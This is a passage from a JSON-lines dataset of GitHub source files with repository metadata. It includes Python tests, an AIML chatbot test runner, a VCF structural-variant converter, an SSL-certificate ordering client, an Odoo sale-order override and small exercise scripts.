four\", 10, test_db) == expected\n\n\ndef test_report_sort_key():\n expected = 1\n assert mail.report_sort_key([0, 1]) == expected\n\n\ndef test_quit_prog():\n expected = \"exit menu\"\n assert mail.quit_prog() == expected\n\n\nprint(\"Function check:\")\nif test_letter_prep() is None:\n print(\"1. letter_prep() is good\")\nif test_letter_format() is None:\n print(\"2. letter_format() is good\")\nif test_input_prep() is None:\n print(\"3. input_prep() is good\")\nif test_thanks_all() is None:\n print(\"4. thanks_all() is good\")\nif test_list_check() is None:\n print(\"5. list_check() is good\")\nif test_input_check() is None:\n print(\"6. input_check() is good\")\nif test_db_update() is None:\n print(\"7. db_update() is good\")\nif test_save_file() is None:\n print(\"8. save_file() is good\")\nif test_report_sort_key() is None:\n print(\"9. 
report_sort_key() is good\")\nif test_quit_prog() is None:\n print(\"10. quit_prog() is good\")\nprint()\nprint(\"10 tests run\")\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/nick_miller/lesson06/test_mailroom-pt4.py","file_name":"test_mailroom-pt4.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"31454697919","text":"import json\nfrom threading import Thread\nfrom handler import run_handler\nfrom sender import run_sender\n\n\ndef init_users_data():\n with open(\"users.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump({\"users\": {}}, file, indent=4)\n\n\ndef run_bot():\n init_users_data()\n\n handler_thread = Thread(target=run_handler)\n handler_thread.start()\n\n sender_thread = Thread(target=run_sender)\n sender_thread.start()\n\n\nif __name__ == \"__main__\":\n run_bot()\n","repo_name":"dexety/dex-trading-system","sub_path":"bots/dydx_state/run_bot.py","file_name":"run_bot.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15541631822","text":"from __future__ import annotations\n\nimport shutil\nimport subprocess\n\n\ndef test_merge_cbf(dials_data, tmp_path):\n data_dir = dials_data(\"centroid_test_data\", pathlib=True)\n\n g = sorted(data_dir.glob(\"*.cbf\"))\n assert len(g) == 9\n\n cmd = [shutil.which(\"dials.merge_cbf\"), \"merge_n_images=3\"] + g\n result = subprocess.run(cmd, cwd=tmp_path, capture_output=True)\n assert not result.returncode and not result.stderr\n g = sorted(tmp_path.glob(\"sum_*.cbf\"))\n assert len(g) == 3\n\n # test alternate mode of accessing image data\n cmd += [\"image_prefix=sum2_\", \"get_raw_data_from_imageset=false\"]\n result = subprocess.run(cmd, cwd=tmp_path, capture_output=True)\n assert not result.returncode and not result.stderr\n\n g2 = sorted(tmp_path.glob(\"sum2_*.cbf\"))\n assert len(g2) == 3\n\n # check summed images are the same in either case\n for f1, f2 in zip(g, g2):\n print(\"Testing\", f1, f2)\n assert f1.read_bytes() == f2.read_bytes()\n","repo_name":"dials/dials","sub_path":"tests/command_line/test_merge_cbf.py","file_name":"test_merge_cbf.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"35"} +{"seq_id":"40105331848","text":"import csv\nimport re\nimport datetime\nimport os\n\nfrom programr.clients.client import BotClient\nfrom programr.utils.files.filefinder import FileFinder\nfrom programr.clients.events.console.config import ConsoleConfiguration\n# from programr.utils.logging.ylogger import YLogger\n\nclass TestQuestion(object):\n\n def __init__(self, question, answers, topic=None, that=None):\n self._category = None\n self._question = question\n self._answers = answers\n self._answers_regex = []\n self._topic = topic\n self._that = that\n for answer in answers:\n if answer is not None and answer:\n if answer[0] == \"!\":\n self._answers_regex.append((\"-\", re.compile(answer)))\n else:\n self._answers_regex.append((\"+\", re.compile(answer)))\n self._response = None\n\n @property\n def category(self):\n return self._category\n\n @category.setter\n def category(self, category):\n self._category = category\n\n @property\n def question(self):\n return self._question\n\n @property\n def answers(self):\n return self._answers\n\n @property\n def answers_regex(self):\n return self._answers_regex\n\n 
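run_bot() above starts the handler and sender threads and then returns immediately without waiting on them. A sketch that joins them explicitly, so a caller can sequence work after both stop; run_handler and run_sender are the callables imported in that file:

from threading import Thread

def run_bot_blocking(*targets):
    threads = [Thread(target=t) for t in targets]
    for t in threads:
        t.start()
    for t in threads:
        t.join()  # block until each worker returns

# usage sketch: run_bot_blocking(run_handler, run_sender)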
@property\n def answers_string(self):\n return \" or \".join(self._answers)\n\n @property\n def response(self):\n return self._response\n\n @response.setter\n def response(self, response):\n self._response = response\n\n @property\n def topic(self):\n return self._topic\n\n @property\n def that(self):\n return self._that\n\nclass TestFileFileFinder(FileFinder):\n\n def __init__(self):\n super().__init__()\n\n def empty_row(self, row):\n return bool(len(row) < 2)\n\n def is_comment(self, question):\n return bool(question[0] == '#')\n\n def is_template(self, question):\n return bool(question[0] == '$')\n\n def clean_up_answer(self, text):\n return text.replace('\"', \"\").strip()\n\n def add_answers_to_template(self, row, question, templates):\n answers = []\n for answer in row[1:]:\n answers.append(self.clean_up_answer(answer))\n templates[question] = answers\n\n def add_template_answers(self, templates, answer, answers):\n if answer in templates:\n template = templates[answer]\n for template_answer in template:\n answers.append(template_answer)\n else:\n print(\"Template [%s] not found!\" % answer)\n\n def load_file_contents(self, filename, userid=\"*\"):\n print(\"Loading aiml_tests from file [%s]\" % filename)\n questions = []\n templates = {}\n with open(filename, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n if self.empty_row(row) is False:\n question = row[0]\n if self.is_comment(question) is False:\n if self.is_template(question):\n self.add_answers_to_template(row, question, templates)\n else:\n answers = []\n that = None\n topic = None\n for answer in row[1:]:\n answer = answer.strip()\n if answer:\n if self.is_template(answer):\n self.add_template_answers(templates, answer, answers)\n else:\n if answer.startswith(\"\\\"THAT=\"):\n thatsplits = self.clean_up_answer(answer).split(\"=\")\n that = thatsplits[1]\n elif answer.startswith(\"\\\"TOPIC=\"):\n topicsplits = self.clean_up_answer(answer).split(\"=\")\n topic = topicsplits[1]\n else:\n answers.append(self.clean_up_answer(answer))\n questions.append(TestQuestion(question, answers, topic=topic, that=that))\n return questions\n\n\n def get_just_filename_from_filepath(self, filepath):\n\n if os.sep in filepath:\n pathsplits = filepath.split(os.sep)\n filename_ext = pathsplits[-1]\n else:\n filename_ext = filepath\n\n if \".\" in filename_ext:\n filesplits = filename_ext.split(\".\")\n filename = filesplits[0]\n else:\n filename = filename_ext\n\n return filename\n\n def find_files(self, path, subdir=False, extension=None):\n # print(\"Path: {}\".format(path))\n found_files = []\n try:\n if subdir is False:\n paths = os.listdir(path)\n for filename in paths:\n if filename.endswith(extension):\n found_files.append((filename, os.path.join(path, filename)))\n else:\n for dirpath, _, filenames in os.walk(path):\n # print(\"filenames: {}\".format(filenames))\n for filename in [f for f in filenames if f.endswith(extension)]:\n found_files.append((filename, os.path.join(dirpath, filename)))\n except FileNotFoundError:\n # YLogger.error(self, \"No directory found [%s]\", path)\n a = 0\n\n return sorted(found_files, key=lambda element: (element[1], element[0]))\n\n def load_dir_contents(self, paths, subdir=False, extension=\".txt\", filename_as_userid=False):\n # print(\"Paths: {}\".format(paths))\n # print(\"Subdir: {}\".format(subdir))\n files = self.find_files(paths, subdir, extension)\n # print(\"Files: {}\".format(files))\n\n collection = {}\n file_maps = {}\n num = 0\n for 
file in files:\n just_filename = self.get_just_filename_from_filepath(file[0])\n try:\n if filename_as_userid:\n userid = just_filename\n else:\n userid = \"*\"\n # print(\"#################file[1]: {}\".format(file[1]))\n collection[just_filename.upper()] = self.load_file_contents(file[1], num)\n file_maps[just_filename.upper()] = file[1]\n num += 1\n except Exception as excep:\n print(excep)\n # YLogger.exception(self, \"Failed to load file contents for file [%s]\"% file[1], excep)\n\n return collection, file_maps\n\n\n def load_single_file_contents(self, filename):\n just_filename = self.get_just_filename_from_filepath(filename)\n\n collection = {}\n file_maps = {}\n try:\n collection[just_filename.upper()] = self.load_file_contents(filename)\n # file_maps[just_filename.upper()] = filename\n except Exception as excep:\n print(excep)\n # YLogger.exception(self, \"Failed to load file contents for file [%s]\"%filename, excep)\n\n return collection, file_maps\n\n\nclass TestRunnerBotClient(BotClient):\n\n def __init__(self):\n super().__init__(\"TestRunner\")\n\n @property\n def test_dir(self):\n return self.arguments.args.test_dir\n\n @property\n def test_file(self):\n return self.arguments.args.test_file\n\n @property\n def qna_file(self):\n return self.arguments.args.qna_file\n\n @property\n def verbose(self):\n return self.arguments.args.verbose\n\n def get_description(self):\n return 'ProgramR Test Runner Client'\n\n def ask_question(self, userid, question):\n response = \"\"\n try:\n client_context = self.create_bot(userid)\n response = client_context.bot.ask_question(client_context, question)\n response = self.remove_oob(response)\n return response\n except Exception as e:\n print(e)\n return \"\"\n \n def remove_oob(self, response):\n return re.sub('', '', response)\n\n def add_client_arguments(self, parser=None):\n if parser is not None:\n parser.add_argument('--test_dir', dest='test_dir', help='directory containing test files to run against grammar')\n parser.add_argument('--test_file', dest='test_file', help='Single file of aiml_tests to run against grammar')\n parser.add_argument('--qna_file', dest='qna_file', help='A file containing questions and answers')\n parser.add_argument('--verbose', dest='verbose', action='store_true', help='print out each question to be asked')\n\n def set_environment(self):\n self.bot.brain.properties.add_property(\"env\", \"TestRunner\")\n\n def get_client_configuration(self):\n return ConsoleConfiguration()\n\n def write_to_file(self, tag, filename):\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (tag.category, tag.question, tag.answers_string, tag.response)\n s = \"results/\" + filename\n f = open(s, \"a\")\n f.write(line)\n f.close()\n\n def run(self):\n file_finder = TestFileFileFinder()\n if self.test_dir is not None:\n print(\"Loading Tests from directory [%s]\" % self.test_dir)\n questions = file_finder.load_dir_contents(self.test_dir, extension=\".tests\", subdir=False)\n else:\n print(\"Loading single file: {}\".format(self.test_file))\n questions = file_finder.load_single_file_contents(self.test_file)\n\n question_and_answers = open(self.qna_file, \"w+\")\n # print(\"Question and answers: {}.\".format(type(question_and_answers)))\n\n # out = dict(list(questions[1].keys())[0: 2])\n\n successes = []\n failures = []\n warnings = 0\n start = datetime.datetime.now()\n # print(\"Questions: {}\".format(type(questions[0])))\n # print(\"Questions: {}\".format(questions[0]))\n # print(\"Questions: {}\".format(type(questions[1])))\n # 
print(\"Questions: {}\".format(out))\n # print(\"Other: {}\".format(other))\n for category in questions[0].keys():\n for test in questions[0][category]:\n test.category = category\n \n # TODO: Still need way to handle srai tag\n # print(\"test.answers_regex: {}\".format(test.answers_regex[0][1].pattern))\n # # print(\"test.answers_regex[0][1]: {}\".format(type(test.answers_regex[0][1])))\n # pattern = test.answers_regex[0][1].pattern\n # if pattern[0:6] == \"\":\n # print(\"SRAI tag detected!!\")\n # test.answers_regex[0][1].pattern = re.sub('', '', pattern)\n # print(\"test.answers_regex after removal: {}\".format(test.answers_regex[0][1]))\n\n if any((c in '$*_^#') for c in test.question):\n try:\n test.question = test.question.replace(\"\", any((c in '$*_^#')))\n except Exception as e:\n print(\"WARNING: Wildcards in question! [%s]\"%test.question)\n warnings = warnings +1\n\n if test.topic is not None:\n conversation = self.get_conversation(0)\n conversation.set_property(\"topic\", test.topic)\n\n if test.that is not None:\n response = self.ask_question(0, test.that)\n else:\n response = self.ask_question(0, test.question)\n \n success = False\n test.response = response\n\n if self.verbose:\n print(test.question, \"->\", test.response)\n question_and_answers.write('\"%s\", \"%s\"\\n'%(test.question, test.response))\n\n if not test.answers_regex:\n if test.response == \"\":\n break\n else:\n for expected_regex in test.answers_regex:\n # print(\"test.answers_regex: {}\".format(test.answers_regex))\n regex_type = expected_regex[0]\n expression = expected_regex[1]\n match = expression.search(response)\n if match is not None and regex_type == \"+\":\n success = True\n break\n elif match is None and regex_type == \"-\":\n success = True\n break\n\n if success:\n successes.append(test)\n else:\n failures.append(test)\n\n question_and_answers.flush ()\n question_and_answers.close ()\n\n stop = datetime.datetime.now()\n diff = stop-start\n total_tests = len(successes)+len(failures)\n\n \n if warnings > 0:\n print(\"Warnings: %d\" % warnings)\n for failure in failures:\n print(\"\\t%s: [%s] expected [%s], got [%s]\" % (failure.category, failure.question, failure.answers_string, failure.response))\n if failure.answers_string is \"None\" or failure.answers_string is \"\":\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (failure.category, failure.question, failure.answers_string, failure.response)\n f = open(\"results/empty.txt\", \"a\")\n f.write(line)\n f.close()\n else:\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (failure.category, failure.question, failure.answers_string, failure.response)\n f = open(\"results/errors.txt\", \"a\")\n f.write(line)\n f.close()\n\n for success in successes:\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (success.category, success.question, success.answers_string, success.response)\n f = open(\"results/successes.txt\", \"a\")\n f.write(line)\n f.close()\n\n print(\"Total processing time %f.2 secs\"%diff.total_seconds())\n print(\"Thats approx %f aiml_tests per sec\"%(total_tests/diff.total_seconds()))\n print(\"Successes: %d\" % len(successes))\n print(\"Failures: %d\" % len(failures))\n\nif __name__ == '__main__':\n\n def run():\n print(\"Loading, please wait...\")\n console_app = TestRunnerBotClient()\n console_app.run()\n\n 
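A compact sketch of the answer-matching convention used in run() above: patterns beginning with "!" are negative (the response must not match), all others are positive. Note that the original compiles the leading "!" into the negative pattern itself; this sketch strips it first.

import re

def matches(response, answers):
    for raw in answers:
        negate = raw.startswith("!")
        found = re.compile(raw.lstrip("!")).search(response) is not None
        if found != negate:  # positive pattern matched, or negative pattern did not
            return True
    return False

assert matches("hello there", ["hello"])
assert matches("hello there", ["!goodbye"])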
run()\n","repo_name":"roholazandie/retrieval_based_chatbot","sub_path":"utils_programr/test_runner/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":14617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6405490556","text":"'''\nconvert GRCh37 to GRCh38 if necessary\ntypes:\n INV, LOSS, GAIN\nchange into tsv\ncolumns:\n chrom\n start\n end\n sv_id\n filter\n source\n genotype\n CN\n type\n genes\n'''\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nfrom lib import Interval_base, utils\nimport gzip\nimport argparse\nimport tempfile\nimport pysam\nimport subprocess\n\ndef get_genes_from_line(row_dict, build, genes, csqt_header=None):\n '''\n GRCh37 gives ensembl_gene_id\n GRCh38 gives symbol under CSQT\n will return\n {value: set(), type: ensembl_id|symbol}\n '''\n result = set()\n for info in row_dict['INFO'].split(';'):\n if build == 'GRCh37' and info.startswith('ensembl_gene_id'):\n ensembl_ids = set( info.split('=')[1].split(',') )\n result.update([i['ensembl_id'] for i in genes if i['ensembl_id'] in ensembl_ids])\n elif build == 'GRCh38' and info.startswith('CSQT'):\n symbols = set()\n if csqt_header is None:\n raise ValueError('Need to provide csqt_header to parse for GRCh38')\n for csqt_field in info.split('=')[1].split(','):\n csqt = dict(zip(csqt_header, csqt_field.split('|')))\n symbols.add(csqt['HGNC'])\n result.update([i['ensembl_id'] for i in genes if i['symbol'] in symbols])\n return result\n\nclass Interval(Interval_base):\n def __init__(self, row_dict):\n ID = row_dict['ID'].split(':')\n chrom = row_dict.get('chrom', row_dict['CHROM'])\n start = int(row_dict['start'])\n self.info = {}\n for field in row_dict['INFO'].split(';'):\n if '=' in field:\n key,val = field.split('=')\n self.info[key] = val\n else:\n self.info[field] = True\n\n # if liftover, row_dict will have an end entry. if not, get it from info\n end = int(row_dict.get('end', self.info['END']))\n\n super().__init__(chrom, start, end)\n self.type = None\n if ID[0] == 'Canvas':\n self.source = 'Canvas'\n self.type = ID[1]\n else:\n # only deal with MantaDEL and MantaINV\n self.source = 'Manta'\n if ID[0] == 'MantaDEL':\n self.type = 'LOSS'\n elif ID[0] == 'MantaINV':\n self.type = 'INV'\n self.alt = row_dict['ALT']\n self.sv_id = row_dict['ID']\n self.filter = row_dict['FILTER']\n self.super_groups = []\n self.groups = []\n genotype_dict = dict(zip(row_dict['FORMAT'].split(\n ':'), row_dict['genotype'].split(':')))\n if 'GT' not in genotype_dict:\n self.genotype = None\n else:\n genotype = genotype_dict['GT'].split('/')\n if '.' 
in genotype:\n self.genotype = genotype\n elif len(set(genotype)) == 1:\n self.genotype = 'HOM'\n else:\n self.genotype = 'HET'\n if 'CN' not in genotype_dict:\n self.CN = None\n else:\n self.CN = int(genotype_dict['CN'])\n\ndef get_genes_at_bnd(chrom, pos, gtf_tbx, gtf_header, args):\n\n bnd_start = max(1, pos - args.padding)\n bnd_end = pos + args.padding\n result = set()\n for row in gtf_tbx.fetch(chrom, bnd_start, bnd_end):\n row_dict = dict(zip(gtf_header, row.split('\\t')))\n result.add(row_dict['ensembl_id'])\n return result\n\n\ndef main(args):\n '''\n Files in GRCh37 is annotated differently to those in GRCh38\n all_annotated_intervals_dict = {}\n Also GRCh37 needs to be lifted over\n only deals with Canvas, and MantaDEL/MantaINV\n '''\n\n vcf_header = ['CHROM', 'start', 'ID', 'REF', 'ALT',\n 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'genotype']\n out_header = ['chrom', 'start', 'end', 'sv_id', 'filter', 'source', 'genotype', 'CN', 'type', 'genes', 'genes_at_bnd']\n\n # read contigs and gtf header\n contigs = set(subprocess.check_output(['tabix', '-l', args.gtf]).decode('utf8').split('\\n'))\n gtf_tbx = pysam.TabixFile(args.gtf)\n gtf_header = []\n with gzip.open(args.gtf, 'rt') as inf:\n for line in inf:\n if line.startswith('#'):\n gtf_header = line.lstrip('#').rstrip().split('\\t')\n break\n # read gtf_genes\n gtf_genes = []\n with gzip.open(args.gtf, 'rt') as inf:\n header = []\n for line in inf:\n row = line.lstrip('#').rstrip().split()\n if not header:\n header = row\n continue\n gtf_genes.append(dict(zip(header, row)))\n \n\n # GRCh37? get new coordinates\n if args.build == 'GRCh37':\n liftover_dict = {}\n fd, bed37 = tempfile.mkstemp()\n utils.makebed(args.input, bed37)\n for line in utils.liftover_file(bed37, args.liftOver_chainfile):\n row = line.rstrip().split('\\t')\n liftover_dict[row[3]] = {\n 'chrom': row[0],\n 'start': row[1],\n 'end': row[2],\n }\n os.close(fd)\n os.remove(bed37)\n # get CSQT header\n csqt_header = None\n if args.build == 'GRCh38':\n with gzip.open(args.input, 'rt') as inf:\n for line in inf:\n if line.startswith('##INFO= 5\n assert (fg_df[\"factoryglobal_manifests\"] is None) or (len(fg_df[\"factoryglobal_manifests\"]) == 0)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/tests/test_factory_global.py","file_name":"test_factory_global.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20623012198","text":"'''定义公共变量'''\nfile = 'npc_heroes.txt'\n#file = 'npc.txt'\n\njsonfile = 'npc_heroes.json'\n\nstr_null = '无此键值' # 读取属性时出现不存在的属性显示键值\nstr_error= '错误��值' \ncurrentline=0\n#属性字典#\nattribute_dict = {\n '护甲': ['物理护甲', '魔法抗性'],\n '攻击': ['最小攻击力', '最大攻击力', '攻击速度', '主动攻击范围', '攻击距离'],\n '属性': ['初始力量', '力量成长', '初始智力', '智力成长', '初始敏捷', '敏捷成长'],\n '移速': ['移动速度','null'],\n '状态': ['初始生命值', '生命恢复速度', '初始魔法值', '魔法恢复速度','null'],\n '视野': ['白天视野', '夜间视野'],\n\n #################################\n\n '技能': ['技能1', '技能2', '技能3', '技能4', '技能5', '技能6'],\n '天赋': ['10级右', '10级左', '15级右', '15级左', '20级右', '20级左', '25级右', '25级左'],\n '英雄主属性': ['英雄主属性']\n ###############################\n}\n\nchoiceitems_dict = {\n '技能': ['', \n '帕吉-腐肉堆积', 'lion_finger_of_death', '斯拉达-深海重击', \n '斯拉克-能量转移', '技能5', '技能6'],\n '天赋': ['', '10级右', '10级左', '15级右', '15级左', '20级右', '20级左', '25级右', '25级左'],\n '英雄主属性': ['', '力量', '敏捷', '智力'],\n ###############################\n 'null': []\n}\n\ntranslation = {\n ####基本属性###############################\n 
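A sketch of the genotype classification rule implemented in Interval above, pulled out as a standalone helper; the function name is hypothetical, and missing calls return None here instead of the raw allele list:

def classify_gt(gt_field):
    alleles = gt_field.split("/")
    if "." in alleles:
        return None  # missing call
    return "HOM" if len(set(alleles)) == 1 else "HET"

assert classify_gt("1/1") == "HOM"
assert classify_gt("0/1") == "HET"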
####左侧##########################################\n #护甲#\n '物理护甲': 'ArmorPhysical',\n '魔法抗性': 'MagicalResistance',\n #攻击#\n '最小攻击力': \"AttackDamageMin\",\n '最大攻击力': \"AttackDamageMax\",\n '攻击速度': \"AttackRate\",\n '主动攻击范围': \"AttackAcquisitionRange\",\n '攻击距离': \"AttackRange\",\n #属性###########################\n '初始力量': \"AttributeBaseStrength\",\n '力量成长': \"AttributeStrengthGain\",\n '初始智力': \"AttributeBaseIntelligence\",\n '智力成长': \"AttributeIntelligenceGain\",\n '初始敏捷': \"AttributeBaseAgility\",\n '敏捷成长': \"AttributeAgilityGain\",\n #'移动速度'#\n '移动速度': \"MovementSpeed\",\n #状态#\n '初始生命值': \"StatusHealth\",\n '生命恢复速度': \"StatusHealthRegen\",\n '初始魔法值': \"StatusMana\",\n '魔法恢复速度': \"StatusManaRegen\",\n #视野#\n '白天视野': 'VisionDaytimeRange',\n '夜间视野': \"VisionNighttimeRange\",\n #技能#\n '技能1': 'Ability1',\n '技能2': 'Ability2',\n '技能3': 'Ability3',\n '技能4': 'Ability4',\n '技能5': 'Ability5',\n '技能6': 'Ability6',\n # 天赋\n '10级右': 'Ability10',\n '10级左': 'Ability11',\n '15级右': 'Ability12',\n '15级左': 'Ability13',\n '20级右': 'Ability14',\n '20级左': 'Ability15',\n '25级右': 'Ability16',\n '25级左': 'Ability17',\n ###################################################\n #####技能##########################################\n #普通技能\n '无技能':'generic_hidden',\n\n\n # 主属性\n '英雄主属性': \"AttributePrimary\",\n #### 其他 ##########################################\n '力量': \"DOTA_ATTRIBUTE_STRENGTH\",\n \"DOTA_ATTRIBUTE_STRENGTH\":'力量',\n '敏捷': \"DOTA_ATTRIBUTE_AGILITY\",\n '智力': \"DOTA_ATTRIBUTE_INTELLECT\",\n ####choice#########################################\n '帕吉-腐肉堆积':'pudge_flesh_heap',\n '死亡一指': 'lion_finger_of_death',\n '斯拉达-深海重击':'slardar_bash',\n '斯拉克-能量转移':\"slark_essence_shift\",\n #### 结尾 ##########################################\n 'null': 'null'\n}\n\n\ndef t():\n '''自动反转 translation的属性与值'''\n l1 = list(translation.keys())\n l2 = list(translation.values())\n for i in l1:\n print(i, l2[l1.index(i)])\n","repo_name":"bmzk/dota2-unit-","sub_path":"公共变量.py","file_name":"公共变量.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75305987619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport argparse\nimport os\n\nimport requests\n\nINAP_API_TOKEN = os.getenv(\"INAP_API_TOKEN\", default=\"FILL_ME\")\nINAP_API_BASE_URL = \"https://inblue.inap.com/api/purchasing/v1/ssl-certs\"\nCOMMON_HEADERS = {\n \"Accept\": \"application/json\",\n \"Authorization\": f\"Bearer {INAP_API_TOKEN}\",\n}\n\nlogger = logging.getLogger(__name__)\n\ndef get_list():\n response = requests.get(f'{INAP_API_BASE_URL}?limit=25&offset=0')\n\n\ndef initialize(hostname: str, first_name: str, last_name: str, email: str, phone: str) -> list[str]:\n try:\n response = requests.post(\n url=f'{INAP_API_BASE_URL}/initialize',\n json={\n \"hostname\": hostname,\n \"contactFirstName\": first_name,\n \"contactLastName\": last_name,\n \"contactEmailAddress\": email,\n \"contactPhoneNumber\": phone\n },\n headers=COMMON_HEADERS\n )\n\n if response.status_code != 200:\n raise Exception(f\"Unable to fetch approve emails, response code[{response.status_code}] {response.json()}\")\n\n resp = response.json()\n\n if resp['success'] is not True:\n raise Exception(f\"Unable to fetch approve emails, response code[{response.status_code}] {response.json()}\")\n\n logger.info(f\"Order #{resp['certId']} created.\")\n # logger.info(f\"available approver email as follows, choose one: \")\n return resp[\"approverEmails\"]\n except Exception as e:\n 
logger.critical(e)\n\n\ndef finalize(order_id: str, approver_email: str, csr: str) -> bool:\n try:\n response = requests.post(\n url=f'{INAP_API_BASE_URL}/{order_id}/finalize',\n json={\n \"approverEmailAddress\": approver_email,\n \"csr\": csr\n },\n headers=COMMON_HEADERS\n )\n\n if response.status_code != 200:\n raise Exception(f\"Unable to fetch order status, maybe you should try again later, \"\n f\"response code[{response.status_code}] {response.json()}\")\n\n resp = response.json()\n\n if resp['success'] != \"1\":\n raise Exception(f\"Unable to fetch order status, maybe you should try again later, \"\n f\"response code[{response.status_code}] {response.json()}\")\n\n logger.info(f\"Order #{order_id} placed.\")\n logger.info(f'Please check your inbox \"{approver_email}\" to finalize your certificate order.')\n # logger.info(f\"available approver email as follows, choose one: \")\n return True\n except Exception as e:\n logger.critical(e)\n\n\ndef gather_info():\n hostname = input(\"Input domain which requires certificate: \").strip()\n first_name = input(\"Your first name: \").strip()\n last_name = input(\"Your last name: \").strip()\n email = input(\"Your email address (use to receive certificate): \").strip()\n phone = input(\"Your phone number: \").strip()\n return hostname, first_name, last_name, email, phone\n\n\ndef interactive_mode(dry_run: bool):\n pass\n\n\ndef automation_mode():\n pass\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('leap4cert')\n parser.add_argument('--debug',\n action='store_true',\n help='Print debug info')\n parser.add_argument('--config',\n default=None,\n nargs='?',\n help='run workflow with pre-defined config')\n parser.add_argument('--version',\n action='version',\n version='%(prog)s v1.0.0')\n\n subprasers = parser.add_subparsers(dest='command')\n\n # sub cmd: order\n # fill domain and contact details to create certificate order\n order = subprasers.add_parser('order', help='create a certificate order')\n order.add_argument(\n '--dry-run',\n help='do not order, just pretend',\n action='store_true'\n )\n\n # sub cmd: finalize\n # fill csr and choose email to complete the DCV process\n finalize = subprasers.add_parser('finalize', help='finalize certificate order')\n finalize.add_argument('id', nargs=1, help='id of order to finalize')\n\n # parse it\n args = parser.parse_args()\n if args.debug:\n print(\"debug: \" + str(args))\n if args.command == 'order':\n interactive_mode(dry_run=args.dry_run)\n elif args.command == 'finalize':\n print(f'processing for order #{args.id[0]}')\n\n # if not os.path.isfile(input_path):\n # print('The path specified does not exist')\n # sys.exit()\n","repo_name":"deamwork/leap4cert","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23712151742","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, api\n\n_DOCTYPE = {'quotation': 'sale_quotation',\n 'sale_order': 'sale_order'}\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.model\n def create(self, vals):\n if vals.get('name', '/') == '/':\n # Automatic Workflow = POS Order\n if vals.get('workflow_process_id', False):\n doctype = self.env['res.doctype'].get_doctype('pos_order')\n fiscalyear_id = self.env['account.fiscalyear'].find()\n # --\n self = self.with_context(doctype_id=doctype.id,\n fiscalyear_id=fiscalyear_id)\n next = self.env['ir.sequence'].next_by_doctype()\n if next:\n 
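Note that the argparse block above rebinds the name finalize to a subparser, shadowing the finalize() function defined earlier in the same file. A sketch of the same wiring with distinct names:

import argparse

parser = argparse.ArgumentParser("leap4cert")
sub = parser.add_subparsers(dest="command")
order_cmd = sub.add_parser("order", help="create a certificate order")
order_cmd.add_argument("--dry-run", action="store_true", help="do not order, just pretend")
finalize_cmd = sub.add_parser("finalize", help="finalize certificate order")
finalize_cmd.add_argument("id", nargs=1, help="id of order to finalize")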
vals['name'] = next\n return super(SaleOrder, self).create(vals)\n","repo_name":"ecosoft-odoo/pb2_addons","sub_path":"pabi_th_doctype/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"75357472100","text":"\nclass Employee:\n list_of_employee = [['Vlad', 'Palamarchuk', 'Ukraine', 2020], ['Vladislav', 'Sodolevski', 'Ukraine', 2019]]\n\n def employee(self):\n lst = []\n try:\n lst.append(str(input('Enter your name: ')))\n lst.append(str(input('Enter your second name: ')))\n lst.append(str(input('Enter your department (country): ')))\n lst.append(int(input('Enter your year hiring: ')))\n self.list_of_employee.append(lst)\n Employee().choose()\n except ValueError:\n print(f'You enter incorrect value, try again!')\n return Employee().employee()\n\n def filter(self):\n filtered = []\n try:\n year_hiring = int(input('Which year of employment to show: '))\n for item in self.list_of_employee:\n for i in item:\n if i == year_hiring:\n filtered.append(item)\n print(filtered)\n\n except ValueError:\n print('There is no such year of admission to work!')\n return Employee().filter()\n\n @staticmethod\n def choose():\n while True:\n try:\n action = int(input('For adding new employee enter 1, for find employee enter 2: '))\n if action == 1:\n Employee().employee()\n elif action == 2:\n Employee().filter()\n else:\n return Employee().choose()\n except ValueError:\n print('You enter incorrect value, try again!')\n return Employee().choose()\n\n\nEmployee().choose()\n","repo_name":"llpvqll/homework_from_course","sub_path":"exeptionLessons/third_task.py","file_name":"third_task.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74426814821","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Y(x):\r\n return 5 * np.sin(10 * x) * np.sin(3 * x) / np.sqrt(x)\r\n\r\n#значення x [1, 7] з кроком 0.1\r\nx_values = np.linspace(1, 7, 100)\r\ny_values = Y(x_values)\r\n\r\n#побудова графіка\r\nplt.plot(x_values, y_values, linestyle='-', color='pink', linewidth=2, label='Y(x)')\r\n\r\n#позначення 